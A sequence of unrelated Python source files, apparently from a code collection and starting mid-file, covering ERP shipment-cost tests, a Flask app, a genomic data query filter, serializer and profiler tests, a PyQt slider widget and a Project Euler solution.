POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment, = sale.shipments shipment.cost = Decimal(25) shipment.save() ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 1) self.assertEqual(sale.invoices[0].total_amount, Decimal('115')) def test0020_multiple_shipment_cost(self): """ Check if multiple invoice on multiple shipment Case 2: Sale 1 with 2 shipments and each costs 15 Test: Invoice total is (50 + 15) and (40 + 15) = 120 """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): total_shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': total_shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': total_shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment1, = sale.shipments shipment1.cost = Decimal(15) shipment1.save() self.assertEqual(len(shipment1.outgoing_moves), 2) # Delete a shipment Move ShipmentOut.write([shipment1], { 'moves': [('remove', [shipment1.inventory_moves[0].id])] }) ShipmentOut.assign([shipment1]) ShipmentOut.pack([shipment1]) ShipmentOut.done([shipment1]) # Select other shipment shipment2, = filter( lambda s: s.id != shipment1.id, sale.shipments ) shipment2.cost = Decimal(15) shipment2.save() ShipmentOut.assign([shipment2]) ShipmentOut.pack([shipment2]) ShipmentOut.done([shipment2]) for shipment in sale.shipments: self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 2) total_amount = sum([ inv.total_amount for inv in sale.invoices ]) self.assertEqual(total_amount, Decimal('120')) def test0030_multiple_shipment_cost(self): """ Check if single invoice on single shipment Case 3: Sale 1 with 3 shipment and each costs 15 Test: Invoice total is (50 + 15) + (40 + 15) + (60 + 0) = 180 """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): total_shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment_capped', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 3, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description2', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': total_shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': total_shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment1, = sale.shipments shipment1.cost = Decimal(15) shipment1.save() self.assertEqual(len(shipment1.outgoing_moves), 3) # Delete a shipment Move ShipmentOut.write([shipment1], { 'moves': [('remove', [ shipment1.inventory_moves[0].id, shipment1.inventory_moves[1].id ])] }) ShipmentOut.assign([shipment1]) ShipmentOut.pack([shipment1]) ShipmentOut.done([shipment1]) # Select other shipment shipment2, = filter( lambda s: s.id != shipment1.id, sale.shipments ) shipment2.cost = Decimal(15) shipment2.save() self.assertEqual(len(shipment2.outgoing_moves), 2) # Delete a shipment Move ShipmentOut.write([shipment2], { 'moves': [('remove', [ shipment2.inventory_moves[0].id, ])] }) ShipmentOut.assign([shipment2]) ShipmentOut.pack([shipment2]) ShipmentOut.done([shipment2]) # Select other shipment shipment3, = filter( lambda s: s.id not in [shipment2.id, shipment1.id], sale.shipments ) shipment3.cost = Decimal(15) shipment3.save() self.assertEqual(len(shipment3.outgoing_moves), 1) ShipmentOut.assign([shipment3]) ShipmentOut.pack([shipment3]) ShipmentOut.done([shipment3]) for shipment in sale.shipments: self.assertEqual(shipment.state, 'done') self.assertEqual(len(sale.invoices), 3) total_amount = sum([ inv.total_amount for inv in sale.invoices ]) self.assertEqual(total_amount, Decimal('180')) def test0040_shipment_cost_on_order(self): """ Check shipment cost method is order """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'order', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 1) # Just the shipment cost invoice = sale.invoices[0] self.assertEqual(invoice.total_amount, Decimal('30')) shipment, = sale.shipments shipment.cost = Decimal(30) shipment.save() self.assertEqual(len(shipment.outgoing_moves), 2) ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(len(sale.invoices), 2) for inv in sale.invoices: if inv.id == invoice.id: # Ignore previous invoice continue # Sale Amount self.assertEqual(inv.total_amount, Decimal('90')) break else: self.fail('No invoice for shipment') def test0050_shipment_cost_on_shipment(self): """ Check shipment cost method is shipment """ with Transaction().start(DB_NAME, USER, context=CONTEXT): Sale = POOL.get('sale.sale') ShipmentOut = POOL.get('stock.shipment.out') self.setup_defaults() with Transaction().set_context({'company': self.company.id}): shipment_cost = Decimal('30') sale, = Sale.create([{ 'reference': 'Sale1', 'sale_date': date.today(), 'invoice_address': self.party1.addresses[0].id, 'shipment_address': self.party1.addresses[0].id, 'party': self.party1.id, 'carrier': self.carrier.id, 'invoice_method': 'shipment', 'shipment_method': 'order', 'shipment_cost_method': 'shipment', 'lines': [ ('create', [{ 'type': 'line', 'quantity': 5, 'unit': self.uom, 'unit_price': 10, 'description': 'Test description1', 'product': self.product1.id, }, { 'type': 'line', 'quantity': 2, 'unit': self.uom, 'unit_price': 20, 'description': 'Test description1', 'product': self.product2.id, }, { 'type': 'line', 'quantity': 1, 'unit': self.uom, 'unit_price': shipment_cost, 'description': 'Shipping', 'product': self.shipping_product.id, 'shipment_cost': shipment_cost }]) ] }]) Sale.quote([sale]) Sale.confirm([sale]) Sale.process([sale]) self.assertEqual(sale.state, 'processing') self.assertEqual(len(sale.invoices), 0) shipment, = sale.shipments shipment.cost = Decimal(30) shipment.save() self.assertEqual(len(shipment.outgoing_moves), 2) ShipmentOut.assign([shipment]) ShipmentOut.pack([shipment]) ShipmentOut.done([shipment]) self.assertEqual(len(sale.invoices), 1) # Just the shipment cost self.assertEqual(sale.invoices[0].total_amount, Decimal('120')) def suite(): """ Define suite """ test_suite = trytond.tests.test_tryton.suite() test_suite.addTests( unittest.TestLoader().loadTestsFromTestCase(TestShipmentCostCap) ) return test_suite if __name__ == '__main__': unittest.TextTestRunner(verbosity=2).run(suite()) ######################### # Author: <NAME> # # Helper Functions ######################### def teampreview_performance(mon_a, mon_b): # We evaluate the performance on mon_a against mon_b as its type advantage a_on_b = b_on_a = -np.inf for type_ in mon_a.types: if type_: a_on_b = max(a_on_b, type_.damage_multiplier(*mon_b.types)) # We do the same for mon_b over mon_a for type_ in mon_b.types: if type_: b_on_a = max(b_on_a, type_.damage_multiplier(*mon_a.types)) # Our performance metric is the different between the two return a_on_b - b_on_a import feedparser from urllib.parse import urlencode from upwork_rss.dto import JobPosition class UpworkRSS: _jobs_rss_url: str = "https://www.upwork.com/ab/feed/jobs/rss" class SortParam: newest = "recency" relevance = "relevance+desc" client_spend = "client_total_charge+desc" client_rating = "client_rating+desc" def __init__(self, security_token: str): self.security_token = security_token def search(self, query: str = None, *skill_ids: int, offset: int = 0, limit: int = 25, sort_by: str = SortParam.newest): params = { "paging": f"{offset};{limit}", "securityToken": self.security_token, "api_params": 1, "query": query if query else "", "ontology_skill_uid": ",".join(map(str, skill_ids)) if skill_ids else "", "sort": sort_by } url = f"{self._jobs_rss_url}?{urlencode(params)}" return list(map(JobPosition.from_feed, feedparser.parse(url).get("entries"))) #coding:utf-8 from flask import Flask from flask_sqlalchemy import SQLAlchemy from flask_debugtoolbar import DebugToolbarExtension from flask_caching import Cache app = Flask(__name__) app.config.from_pyfile('settings.py') # 从settings.py中导入设置 # 去除jinja模板中的空白行 app.jinja_env.trim_blocks = True app.jinja_env.lstrip_blocks = True db = SQLAlchemy(app) toolbar = DebugToolbarExtension(app) cache = Cache(app) from spwb import views, errors, commands <reponame>HunterLC/FARSystem from flask import render_template from app import init_app from flask import request from app.views.actor import get_frequent_cooperation_by_id app = init_app() # 创建app @app.route('/',methods=['GET','POST']) def login(): return render_template("login.html",errors="") if __name__ == '__main__': app.run() <reponame>jdayton3/Geney import json import io import csv import msgpack import pandas as pd from shapeshifter.files import SSFile class GeneyQuery: """ Represents and handles queries stored by Geney as JSON file """ def __init__(self, geney_file_collection, json_filter): """ Initializes GeneyQuery object. self.filters is a dictionary mapping column names to lists containing either a dictionary or lists of values self.features is a list of additional columns to include in the output self.groups is a list with strings, where if any column starts with any of these values plus a double underscore, it should be included in the output self.geney_file_collection is a GeneyFileCollection object with all necessary files to perform filters """ # with open(geney_file_collection.json_file) as f: # data = json.load(f) data = json.loads(json_filter) self.filters = data["filters"] self.features = data["features"] self.groups = data["groups"] self.geney_file_collection = geney_file_collection @staticmethod def write_to_file(df, out_file_path, out_file_type=None, gzip_results=False, include_index=False, null='NA', index_col="Sample", transpose=False): output_file = SSFile.factory(out_file_path, out_file_type) output_file.write_to_file(df, gzipResults=gzip_results, includeIndex=include_index, null=null, indexCol=index_col, transpose=transpose) return out_file_path def filter_data(self, samples_only=False): indexes_sets = [] for single_filter in self.filters: if self.__determine_filter_type(self.filters[single_filter]) == "discrete": indexes_sets.append(self.__perform_discrete_filter(single_filter, self.filters[single_filter])) elif self.__determine_filter_type(self.filters[single_filter]) == "continuous": indexes_sets.append(self.__perform_continuous_filter(single_filter, self.filters[single_filter])) else: raise Exception("Error: JSON query is malformed") # Find intersection of all sets produced by filters result_row_indexes = set.intersection(*indexes_sets) result_row_indexes = sorted(list(result_row_indexes)) # Grab rows that match the indexes matching_samples = [] for index in result_row_indexes: matching_samples.append(self.geney_file_collection.samples[index]) if samples_only: return matching_samples # Determine which columns (specifically the indexes) to grab for all the matching samples desired_column_indexes = self.__determine_additional_columns() desired_column_indexes.insert(0, 0) output_rows = [] header_row = [self.geney_file_collection.features[i].decode('UTF-8') for i in desired_column_indexes] output_rows.append(header_row) del (desired_column_indexes[0]) # TODO: add an option for grabbing all items in the row, not just the desired columns? for sample in matching_samples: self.geney_file_collection.tsv_file.seek(self.geney_file_collection.tsv_map[sample][0]) entire_row = self.geney_file_collection.tsv_file.read(self.geney_file_collection.tsv_map[sample][1]).rstrip( b"\n").split(b"\t") reduced_row = [sample] + [entire_row[i - 1] for i in desired_column_indexes] reduced_row = (b"\t".join(reduced_row)).decode('UTF-8') reduced_row = reduced_row.split("\t") output_rows.append(reduced_row) df = self.__build_pandas_dataframe(output_rows) return df def __build_pandas_dataframe(self, output_rows): output = io.StringIO() csv_writer = csv.writer(output, delimiter='\t') for row in output_rows: csv_writer.writerow(row) output.seek(0) df = pd.read_csv(output, sep='\t') return df def __write_to_csv(self, output_rows): out = open("output.tsv", "w") for row in output_rows: out.write(row) def __determine_additional_columns(self): """ Finds the indexes of all columns whose data will be reported. This includes columns specified in the filters, the features, and the groups """ # Start with additional requested features column_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i].decode("UTF-8") in self.features)] # Add features mentioned in the filters filter_columns = [key for key in self.filters] filter_column_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i].decode("UTF-8") in filter_columns)] column_indexes += filter_column_indexes # Add features determined by groups column_indexes += self.__determine_group_columns() column_indexes = sorted(list(set(column_indexes))) return column_indexes def __determine_group_columns(self): """ Finds column names that start with whatever is listed under self.groups plus a double underscore. Returns the index of those columns """ columns_from_group = [] for group in self.groups: temp_columns = [feature for feature in self.geney_file_collection.features if (feature.decode("UTF-8").startswith(group + "__"))] columns_from_group += temp_columns # get indexes of the columns group_indexes = [i for i in range(0, len(self.geney_file_collection.features)) if (self.geney_file_collection.features[i] in columns_from_group)] return group_indexes def __determine_filter_type(self, single_filter): if isinstance(single_filter[0], dict): return "continuous" elif isinstance(single_filter[0], str) or isinstance(single_filter, bool): return "discrete" else: print(single_filter) raise Exception("Error: JSON filter is malformed") def __perform_discrete_filter(self, column_name, values_list): """ Performs a filter for discrete values :param column_name: string name of a column to be examined :param values_list: list of string values that are accepted in the column of 'column_name' :return: set with row indexes of rows that match filter criteria """ location_range = self.geney_file_collection.transposed_map[bytes(column_name, encoding='utf-8')] self.geney_file_collection.transposed_tsv_file.seek(location_range[0]) desired_feature_data = self.geney_file_collection.transposed_tsv_file.read(location_range[1]).split(b"\t") matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item].decode("UTF-8") in values_list)] return set(matching_samples) def __perform_continuous_filter(self, column_name, filter_info): """ Performs a filter for continuous values :param column_name: string name of a column to be examined :param filter_info: list with a dictionary with key "operator" whose value is a string representation of a mathematcial operator, and a key "value" with a numerical value :return: set with row indexes of rows that match filter criteria """ # TODO: find out how to fix the line below, converting column_name to b location_range = self.geney_file_collection.transposed_map[bytes(column_name, encoding='utf-8')] self.geney_file_collection.transposed_tsv_file.seek(location_range[0]) desired_feature_data = self.geney_file_collection.transposed_tsv_file.read(location_range[1]).split(b"\t") # matching_samples holds the indexes of samples that match the filters matching_samples = [] operator = filter_info[0]["operator"] value = filter_info[0]["value"] if operator == "<": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) < value)] elif operator == "<=": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) <= value)] elif operator == ">": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) > value)] elif operator == ">=": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) >= value)] elif operator == "==": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) == value)] elif operator == "!=": matching_samples = [item for item in range(0, len(desired_feature_data)) if (desired_feature_data[item] != b'NA' and float(desired_feature_data[item]) != value)] else: raise Exception("Error: invalid operator in JSON filter: " + str(operator)) return set(matching_samples) class GeneyFileCollection: """ Stores all TSV and MessagePack file information needed allow for future filtering """ def __init__(self, tsv_file_path, messagepack_tsv_path, transposed_tsv_file_path, transposed_messagepack_tsv_path): messagepack_tsv = open(messagepack_tsv_path + "/sample_data.msgpack", "rb") self.tsv_map = msgpack.unpack(messagepack_tsv, max_map_len=10000000, max_array_len=10000000) sample_file = open(messagepack_tsv_path + "/samples.msgpack", "rb") self.samples = msgpack.unpack(sample_file, max_map_len=10000000, max_array_len=10000000) transposed_map_file = open(transposed_messagepack_tsv_path + "/sample_data.msgpack", "rb") self.transposed_map = msgpack.unpack(transposed_map_file, max_map_len=10000000, max_array_len=10000000) transposed_samples_file = open(transposed_messagepack_tsv_path + "/samples.msgpack", "rb") self.transposed_samples = msgpack.unpack(transposed_samples_file, max_map_len=10000000, max_array_len=10000000) self.tsv_file = open(tsv_file_path, "rb") self.transposed_tsv_file = open(transposed_tsv_file_path, "rb") features_file = open(messagepack_tsv_path + "/features.msgpack", "rb") self.features = msgpack.unpack(features_file, max_map_len=10000000, max_array_len=10000000) from PyQt5.QtWidgets import (QWidget, QSlider, QHBoxLayout, QLabel, QApplication) from PyQt5.QtCore import Qt from PyQt5.QtGui import QPixmap import sys class SliderImpl(QSlider): def __init__(self, callback): super().__init__() self.callback = callback def mouseReleaseEvent(self, event): super(QSlider, self).mouseReleaseEvent(event) self.callback() class Slider(QWidget): def __init__(self, parent, min, max, callback, release_callback): super().__init__() self.parent = parent self.callback = callback self.index = int((max - min ) / 2) hbox = QHBoxLayout() self.slider = SliderImpl(release_callback) self.slider.setOrientation(Qt.Horizontal) self.slider.setRange(min, max) self.slider.setValue(self.index) self.slider.setFocusPolicy(Qt.NoFocus) self.slider.setPageStep(1) self.slider.valueChanged.connect(self.onDataChanged) self.label = QLabel(str(min), self) self.label.setAlignment(Qt.AlignCenter | Qt.AlignVCenter) self.label.setMinimumWidth(80) self.label.setText(str(self.index)) hbox.addWidget(self.slider) hbox.addSpacing(15) hbox.addWidget(self.label) self.setLayout(hbox) def onDataChanged(self, value): self.index = value self.label.setText(str(value)) self.callback() def setRange(self, min, max): if min > self.slider.value(): self.index = min self.slider.setValue(self.index) self.callback() if max < self.slider.value(): self.index = max self.slider.setValue(self.index) self.callback() self.slider.setValue(self.index) self.onDataChanged(self.index) self.slider.setRange(min, max) def getIndex(self): return self.index<reponame>caioalexleme/Curso_Python a = [2, 3, 4, 7] b = a # Cria uma sincronização da lista A com a lista B b[2] = 8 print(f'Lista A: {a}') print(f'Lista B: {b}') print('-' * 10) b = a [:] # Agora lista B cria ua cópia da lista A utilizando fatiamento b[2] = 6 print(f'Lista A: {a}') print(f'Lista B: {b}')""" Tests to cover bulk create and update using serializers. """ from __future__ import unicode_literals from django.test import TestCase from django.utils import six from rest_framework import serializers class BulkCreateSerializerTests(TestCase): """ Creating multiple instances using serializers. """ def setUp(self): class BookSerializer(serializers.Serializer): id = serializers.IntegerField() title = serializers.CharField(max_length=100) author = serializers.CharField(max_length=100) self.BookSerializer = BookSerializer def test_bulk_create_success(self): """ Correct bulk update serialization should return the input data. """ data = [ { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' }, { 'id': 1, 'title': 'If this is a man', 'author': '<NAME>' }, { 'id': 2, 'title': 'The wind-up bird chronicle', 'author': '<NAME>' } ] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is True assert serializer.validated_data == data assert serializer.errors == [] def test_bulk_create_errors(self): """ Incorrect bulk create serialization should return errors. """ data = [ { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' }, { 'id': 1, 'title': 'If this is a man', 'author': '<NAME>' }, { 'id': 'foo', 'title': 'The wind-up bird chronicle', 'author': '<NAME>' } ] expected_errors = [ {}, {}, {'id': ['A valid integer is required.']} ] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False assert serializer.errors == expected_errors assert serializer.validated_data == [] def test_invalid_list_datatype(self): """ Data containing list of incorrect data type should return errors. """ data = ['foo', 'bar', 'baz'] serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False text_type_string = six.text_type.__name__ message = 'Invalid data. Expected a dictionary, but got %s.' % text_type_string expected_errors = [ {'non_field_errors': [message]}, {'non_field_errors': [message]}, {'non_field_errors': [message]} ] assert serializer.errors == expected_errors def test_invalid_single_datatype(self): """ Data containing a single incorrect data type should return errors. """ data = 123 serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False expected_errors = {'non_field_errors': ['Expected a list of items but got type "int".']} assert serializer.errors == expected_errors def test_invalid_single_object(self): """ Data containing only a single object, instead of a list of objects should return errors. """ data = { 'id': 0, 'title': 'The electric kool-aid acid test', 'author': '<NAME>' } serializer = self.BookSerializer(data=data, many=True) assert serializer.is_valid() is False expected_errors = {'non_field_errors': ['Expected a list of items but got type "dict".']} assert serializer.errors == expected_errors """ Test classes for the liwc module. """ import unittest import numpy as np from numpy.testing import assert_allclose from liwc_methods import LIWCScores class TestLIWCScores(unittest.TestCase): """ Tests for the LIWCScore class. """ def test_get_neuroticism(self): """ Test if the right calculation is done for getting neuroticism. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([0.18]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_neuroticism(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_extraversion(self): """ Test if the right calculation is done for getting extraversion. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([0.92]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_extraversion(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_openness(self): """ Test if the right calculation is done for getting openness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([-2.55]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_openness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_acceptance(self): """ Test if the right calculation is done for getting acceptance. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([1.08]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_agreeableness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_conscientiousness(self): """ Test if the right calculation is done for getting conscientiousness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([-0.54]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_conscientiousness(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_big_five_scores(self): """ Test if the right calculation is done for getting conscientiousness. """ feed = np.array([[1] for _ in range(66)]) expected = np.array([[-2.55], [-0.54], [0.92], [1.08], [0.18]]) result = LIWCScores(signf=0.001, version=2001, author='yarkoni').get_big_five_scores(feed) assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_05(self): """ Tets if you properly get the 0.05 precision matrix if you enter 0.05 as signf. """ liwc = LIWCScores(signf=0.05, version=2001, author='yarkoni') expected = liwc.corr_05 result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_01(self): """ Tets if you properly get the 0.01 precision matrix if you enter 0.01 as signf. """ liwc = LIWCScores(signf=0.01, version=2001, author='yarkoni') expected = liwc.corr_01 result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_signficance_matrix_05_golbeck(self): """ Tets if you properly get the 0.05 precision matrix if you enter 0.05 as signf and author Golbeck. """ liwc = LIWCScores(signf=0.05, version=2007, author='golbeck') expected = liwc.corr_05_golbeck result = liwc._get_significance_matrix() assert_allclose(expected, result, rtol=1e-10, atol=0) def test_get_columns_2001(self): """ Tets if all columns are returned of the LIWC 2001 Yarkoni version. """ liwc = LIWCScores(signf=0.01, version=2001, author='yarkoni') expected = 66 result = liwc._get_columns(2001) self.assertEqual(expected, len(result)) def test_get_columns_2007(self): """ Tets if all columns are returned of the LIWC 2007 Golbeck version. """ liwc = LIWCScores(signf=0.01, version=2007, author='golbeck') expected = 61 result = liwc._get_columns(2007) self.assertEqual(expected, len(result)) <reponame>hhaoyan/ScientificTopics import json import os import sys import requests import yaml default_model_url = 'https://github.com/hhaoyan/ScientificTopics/' \ 'raw/master/data_20190830/default_model.yaml' default_model_name = 'data_20190830' def _data_dir(): data_dir = os.path.expanduser('~/.scientific_topics') if not os.path.exists(data_dir): os.mkdir(data_dir) return data_dir def _download_file(url, path): try: os.makedirs(os.path.dirname(path)) except FileExistsError: pass with requests.get(url, stream=True) as req: size = 0 req.raise_for_status() with open(path, 'wb') as f: for chunk in req.iter_content(chunk_size=8192): if chunk: f.write(chunk) size += len(chunk) return size def download_model(metadata_url=default_model_url): data_dir = _data_dir() print("Fetching metadata...") metadata_req = requests.get(metadata_url) metadata = yaml.safe_load(metadata_req.content) model_home = os.path.join(data_dir, metadata['model_name']) if os.path.exists(os.path.join(model_home, 'downloaded')): return try: os.mkdir(model_home) except FileExistsError: pass with open(os.path.join(model_home, 'meta.json'), 'w') as f: json.dump(metadata, f) for download in metadata['data_files']: print("Fetching file %s from %s..." % ( download['file_fn'], os.path.join(model_home, download['file_fn'])), end='') sys.stdout.flush() print("%d bytes" % _download_file( download['file_url'], os.path.join(model_home, download['file_fn']))) with open(os.path.join(model_home, 'downloaded'), 'w') as f: f.write('downloaded') def _get_default_model(model_name=default_model_name, topic_model=0): data_dir = _data_dir() model_home = os.path.join(data_dir, model_name) if not os.path.exists(os.path.join(model_home, 'downloaded')): raise FileNotFoundError('No model found at %s, did you use ' '"python -m ScientificTopics.download"?' % model_home) with open(os.path.join(model_home, 'meta.json')) as f: metadata = json.load(f) if isinstance(topic_model, int): topic_model = metadata['topic_models'][topic_model]['name'] try: topic_model = next(x for x in metadata['topic_models'] if x['name'] == topic_model) except StopIteration: raise NameError('No such topic model: ' + topic_model) punkt_file = os.path.join(model_home, metadata['punkt_data_fn']) spm_file = os.path.join(model_home, metadata['sentencepiece_data_fn']) stopwords = os.path.join(model_home, metadata['stopwords_data_fn']) lda_result_dir = os.path.join(model_home, topic_model['root']) return { 'punkt_model': punkt_file, 'spm_model': spm_file, 'stopwords': stopwords, 'lda_result_dir': lda_result_dir, 'alpha': topic_model['alpha'], 'beta': topic_model['beta'], 'num_vocab': metadata['vocab_size'], } if __name__ == '__main__': download_model() <filename>solutions/problem18.py # coding: utf8 # Author: <NAME> (~wy) # Date: 2017 # Triangle Sums triangle = """75 95 64 17 47 82 18 35 87 10 20 04 82 47 65 19 01 23 75 03 34 88 02 77 73 07 63 67 99 65 04 28 06 16 70 92 41 41 26 56 83 40 80 70 33 41 48 72 33 47 32 37 16 94 29 53 71 44 65 25 43 91 52 97 51 14 70 11 33 28 77 73 17 78 39 68 17 57 91 71 52 38 17 14 91 43 58 50 27 29 48 63 66 04 68 89 53 67 30 73 16 69 87 40 31 04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""" triangle_lines = triangle.split("\n") triangle_arr = [] for line in triangle_lines: arr = line.split() for i in range(len(arr)): arr[i] = int(arr[i]) triangle_arr.append(arr) size = 14 memory = {} def tri_sumx(i,j): x = memory.get(str(i)+","+str(j)) if x is None: answer = tri_sum(i,j,0) memory[str(i)+","+str(j)]= answer return answer else: return memory.get(str(i)+","+str(j)) def tri_sum(i,j,summary): if i == 14: return summary + triangle_arr[i][j] a = tri_sumx(i+1,j) b = tri_sumx(i+1,j+1) return max(a,b)+triangle_arr[i][j] for i in range(14,-1,-1): for j in range(i,-1,-1): tri_sumx(i,j) <reponame>lizeyan/pyprof from pyprof import profile, clean, Profiler, report import time import numpy as np from .test_utils import close # noinspection PyProtectedMember def test_profile_proxy(): clean() from pyprof.pyprof import _root_profiler times = np.abs(np.random.normal(0.1, 0.01, 10)) with profile("p1"): time.sleep(0.5) for t in times: with profile("p2"): time.sleep(t) p1 = Profiler("p1") p2 = Profiler("p2", p1) assert _root_profiler._children == {p1} assert p1.count == 1 assert p2.count == len(times) assert close(p2.average, np.mean(times).item()) assert close(p1.total, 0.5 + sum(times)) print() print(report()) # noinspection PyProtectedMember def test_profile_proxy_decorator(): times = np.abs(np.random.normal(0.1, 0.01, 10)) @profile def f(_): time.sleep(_) @profile("p1") def g(): time.sleep(0.5) for t in times: f(t) clean() from pyprof.pyprof import _root_profiler g() p1 = Profiler("p1") p2 = Profiler("test_profile_proxy_decorator.<locals>.f", p1) assert _root_profiler._children == {p1} assert p1.count == 1 assert p2.count == len(times) assert close(p2.average, np.mean(times).item()) assert close(p1.total, 0.5 + sum(times)) print() print(report()) <filename>shed/cli.py import sys import click from . import __lang_extension__, __lang_name__, __version__ from .config import settings from .execute import execute from .transpiler import TranspilerContext, transpile from .utils import console, info, prettify, print_center, print_line, print_padded, title 